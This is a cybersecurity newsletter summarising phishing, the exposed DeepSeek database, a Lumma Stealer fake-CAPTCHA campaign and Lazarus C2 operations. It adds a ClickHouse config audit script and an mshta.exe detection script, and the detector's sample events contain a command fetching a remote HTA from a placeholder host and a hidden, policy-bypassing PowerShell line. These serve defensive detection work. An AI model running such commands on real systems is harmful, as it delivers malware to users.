CyberBakery Chronicles
Welcome to this week’s edition of CyberBakery Chronicles, your trusted source for the latest news in digital security. Whether you're an enthusiastic novice or a seasoned expert, our insightful content aims to keep you informed and engaged.

Your Weekly Cybersecurity Update (31 Jan 2025)

Google is fortifying its security measures following a recent elaborate voice phishing attack documented by programmer Zach Latta.
Latta, founder of Hack Club, detailed a close call he had with scammers who attempted to hijack his Google account through a series of tactics that bypassed traditional security measures.
The scammers, posing as Google Workspace support staff, contacted Latta, claiming to have detected a suspicious login attempt. They used a phone number associated with Google Assistant calls and a seemingly legitimate "Google" caller ID. Additionally, a password reset email was sent from a genuine Google Workspace address, making the scam highly convincing.
However, Latta remained cautious and ultimately identified inconsistencies in the scammers' story. Notably, one scammer contradicted another on details, and a request to call them back was met with an unfazed response, raising a red flag.
This incident exposes a critical weakness: attackers were able to create Google Workspace accounts on unverified g.co subdomains, which let them send password reset emails that appeared to originate from Google itself.
Google has acknowledged the issue and is taking steps to bolster its defences against such scams. They have suspended the account used in this attempt and are working to prevent attackers from exploiting g.co subdomains during registration.
The Latta case is a stark reminder to be wary of unsolicited calls, even if they appear to come from legitimate sources. Users should never provide sensitive information over the phone and should be extra cautious about emails originating from unverified senders.
This incident also highlights the evolving nature of phishing tactics and the need for continuous vigilance and security improvements.

For years, cybersecurity teams were often perceived as the "Department of No," constantly blocking initiatives due to security concerns. However, to demonstrate value and foster collaboration, many teams have shifted towards a more accommodating approach.
While this shift has its benefits, some experts argue that it may have gone too far, leading to security teams overlooking critical risks and compromising their ability to effectively protect the organization.
Avoiding necessary "NOs" can have detrimental consequences, including:
Misalignment: Lack of clear boundaries can lead to confusion and misalignment between security teams and other departments.
Overwhelmed Teams: Constant pressure to accommodate requests can overwhelm security teams and lead to burnout.
Unmanaged Risks: Compromising security measures can increase the organisation's vulnerability to cyber threats.
However, saying "no" effectively is crucial. It requires careful consideration, clear communication, and a focus on aligning security decisions with broader business goals.
By emphasizing the importance of well-considered "nos" and fostering open communication and collaboration, security teams can better protect their organizations while maintaining positive relationships with other departments.

The Hacker’s News
DeepSeek, a rapidly emerging Chinese AI startup, inadvertently exposed a ClickHouse database to the internet, potentially allowing unauthorised access to sensitive information. The exposed data included over a million log entries containing chat histories, secret keys, backend details, API secrets, and operational metadata.
This vulnerability permitted full control over database operations without requiring authentication, enabling the execution of arbitrary SQL queries via a web browser. Upon notification, DeepSeek promptly secured the database. This incident underscores the critical importance of implementing robust security measures alongside the rapid deployment of AI services to protect customer data and prevent accidental exposures.
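The DeepSeek exposure comes down to a database reachable from the internet with no credentials required. The following audit script is an added example (not DeepSeek's configuration and not code from the original post): it parses a ClickHouse users.xml fragment and flags a user that has no password, is reachable from any network address, or has access management enabled. The two fragments are constructed for illustration; the element names follow ClickHouse's users.xml layout as the editor understands it, and the hardened password hash is a placeholder.

```python
import xml.etree.ElementTree as ET

# Constructed weak users.xml fragment: empty password, any source address,
# and the ability to create users and grant privileges.
WEAK_USERS_XML = """<clickhouse>
  <users>
    <default>
      <password></password>
      <networks><ip>::/0</ip></networks>
      <profile>default</profile>
      <quota>default</quota>
      <access_management>1</access_management>
    </default>
  </users>
</clickhouse>"""

# Constructed hardened fragment: hashed password (placeholder value), access
# limited to loopback and one internal range, no access management.
HARDENED_USERS_XML = """<clickhouse>
  <users>
    <default>
      <password_sha256_hex>PLACEHOLDER_SHA256_HEX</password_sha256_hex>
      <networks><ip>::1</ip><ip>127.0.0.1</ip><ip>10.0.0.0/8</ip></networks>
      <profile>readonly</profile>
      <quota>default</quota>
      <access_management>0</access_management>
    </default>
  </users>
</clickhouse>"""

# Address specifications that mean "any host".
ANY_HOST = {"::/0", "0.0.0.0/0"}
# Any of these elements carrying a non-empty value counts as a credential.
PASSWORD_TAGS = ("password", "password_sha256_hex", "password_double_sha1_hex")


def audit_users(xml_text):
    """Return a list of findings (strings) for every user in a users.xml document."""
    root = ET.fromstring(xml_text)
    findings = []
    users = root.find("users")
    if users is None:
        return findings
    for user in users:
        name = user.tag  # ClickHouse keys each user by its element name
        has_secret = any((user.findtext(tag) or "").strip() for tag in PASSWORD_TAGS)
        if not has_secret or user.find("no_password") is not None:
            findings.append(f"{name}: no password set")
        ips = [ip.text.strip() for ip in user.iter("ip") if ip.text]
        # A missing <networks> block is flagged conservatively: no restriction is declared.
        if not ips or any(ip in ANY_HOST for ip in ips):
            findings.append(f"{name}: reachable from any network address")
        if (user.findtext("access_management") or "0").strip() == "1":
            findings.append(f"{name}: access_management enabled (can create users and grant privileges)")
    return findings


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_USERS_XML), ("hardened", HARDENED_USERS_XML)):
        print(label, audit_users(doc) or ["no findings"])
```

Run it against a real users.xml to get a quick list of users that would accept queries from anyone. The network check here only covers the users.xml side; the listen address in config.xml and the host firewall decide whether the HTTP and native ports are reachable from outside at all, and both should be reviewed together.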
Bloomberg, Financial Times, and The Wall Street Journal have reported that OpenAI and Microsoft are actively investigating DeepSeek’s potential unauthorised use of OpenAI's application programming interface (API) to train its own models on the outputs generated by OpenAI's systems. This practice, known as distillation, raises significant concerns regarding intellectual property and compliance.

Cybersecurity researchers have identified a global malware campaign that uses fake CAPTCHA verification pages to distribute the Lumma information stealer. This campaign targets multiple industries, including healthcare, banking, marketing, and telecommunications, with notable activity in countries such as Argentina, Colombia, the United States, and the Philippines.
The attack begins when a user visits a compromised website and is redirected to a fraudulent CAPTCHA page. This page instructs the user to copy and paste a command into the Windows Run prompt, utilizing the legitimate mshta.exe utility to download and execute a malicious HTA file from a remote server. This method bypasses browser-based security measures by prompting the user to perform actions outside the browser environment.
The HTA file executes a PowerShell command that downloads additional scripts, ultimately leading to the deployment of the Lumma Stealer malware. Notably, the malware employs techniques to evade detection, such as bypassing the Windows Antimalware Scan Interface (AMSI).
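The chain described above (Run prompt, mshta.exe fetching a remote HTA, then PowerShell) leaves a recognisable pattern in process-creation telemetry. The following detection logic is an added example, not code from the original post or from the researchers it summarises: it runs three rules over constructed Sysmon-style process-creation records (parent image, image, command line are assumed field names) and reports which events match and why.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record, modelled on Sysmon Event ID 1 fields (assumed)."""
    event_id: int
    parent_image: str
    image: str
    command_line: str


# mshta.exe pulling its HTA from a URL rather than a local file.
REMOTE_RE = re.compile(r"\b(https?|ftp)://", re.IGNORECASE)
# Interpreters an HTA payload typically chains into; as children of mshta.exe they are suspicious.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return the list of rule names the event matches (empty list for benign events)."""
    reasons = []
    image = basename(ev.image)
    parent = basename(ev.parent_image)
    if image == "mshta.exe":
        if REMOTE_RE.search(ev.command_line):
            reasons.append("mshta.exe fetching a remote HTA")
        if parent == "explorer.exe":
            # Commands typed into the Run prompt are started by Explorer.
            reasons.append("mshta.exe launched from Explorer (Run prompt)")
    if parent == "mshta.exe" and image in SCRIPT_HOSTS:
        reasons.append(f"{image} spawned by mshta.exe")
    return reasons


def detect(events):
    """Map event_id -> matched rules for every event that matches at least one rule."""
    hits = {}
    for ev in events:
        reasons = classify(ev)
        if reasons:
            hits[ev.event_id] = reasons
    return hits


# Constructed sample telemetry; the URL uses a reserved placeholder domain.
SAMPLE_EVENTS = [
    ProcEvent(1, r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta https://captcha.example.invalid/verify.hta"),
    ProcEvent(2, r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -w hidden -ep bypass -c <payload omitted>"),
    ProcEvent(3, r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              "notepad.exe C:\\Users\\alice\\notes.txt"),
    ProcEvent(4, r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\mshta.exe",
              "mshta.exe \"C:\\Program Files\\Vendor\\setup.hta\""),
]


if __name__ == "__main__":
    for event_id, reasons in detect(SAMPLE_EVENTS).items():
        print(event_id, "; ".join(reasons))
```

Event 4 shows why the rules are combined rather than alerting on every mshta.exe start: an installer running a local HTA matches neither the remote-URL nor the Explorer-parent rule, while the Run-prompt pattern trips both. The same three conditions translate directly into a SIEM query over the equivalent fields.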
Lumma Stealer operates under a malware-as-a-service (MaaS) model and has been increasingly active in recent months. Attackers have diversified their delivery methods, including the use of approximately 1,000 counterfeit domains impersonating platforms like Reddit and WeTransfer. These domains redirect users to download password-protected archives containing an AutoIT-based dropper, which then executes the Lumma Stealer.
This campaign is another reminder that cybercriminals continue to refine their social engineering tactics. Fake CAPTCHA pages provide a stealthy way to deliver malware, making it crucial for users to stay vigilant and for organisations to strengthen their security posture with a combination of awareness training and advanced threat detection.

Recent investigations have unveiled that North Korea's Lazarus Group employs a sophisticated web-based administrative platform to manage its command-and-control (C2) operations. This platform, built using React for the front end and Node.js for the back end, is consistently deployed across multiple C2 servers, enabling the group to centrally oversee compromised systems, control payload distribution, and efficiently handle exfiltrated data.
The Lazarus Group has been linked to a supply chain attack campaign known as Operation Phantom Circuit, which targeted the cryptocurrency sector and developers worldwide. In this campaign, the group embedded obfuscated backdoors into legitimate software packages, deceiving developers into executing compromised applications. This approach allowed them to exfiltrate sensitive data and manage victims through their C2 servers.
To conceal their activities, the group employs an elaborate network of Virtual Private Networks (VPNs) and proxies. They route traffic through intermediaries, including Astrill VPN endpoints and Oculus Proxy nodes registered to Sky Freight Limited in Hasan, Russia, before reaching their C2 infrastructure. Despite these obfuscation techniques, researchers have traced the operations back to Pyongyang, North Korea, identifying six distinct North Korean IP addresses initiating connections.
The Lazarus Group's administrative platform features capabilities such as monitoring device details, collecting browser-stored credentials, and tracking victim interaction timestamps. This level of precision and customisation indicates a deliberate effort to manage stolen data at scale while evading detection.
This discovery underscores the advanced operational security practices of the Lazarus Group in conducting global cyber operations, highlighting their ability to adapt and evolve their tactics to maintain persistent access and evade detection.
Quick favour: Let’s spread the value! If you find this newsletter useful, don’t keep it to yourself. 👉 Share it with friends and colleagues who could benefit from it. Remember, one share could spark insight, ignite inspiration, or lead to a breakthrough for someone else.
Let’s make 2025 the year of shared knowledge and community growth.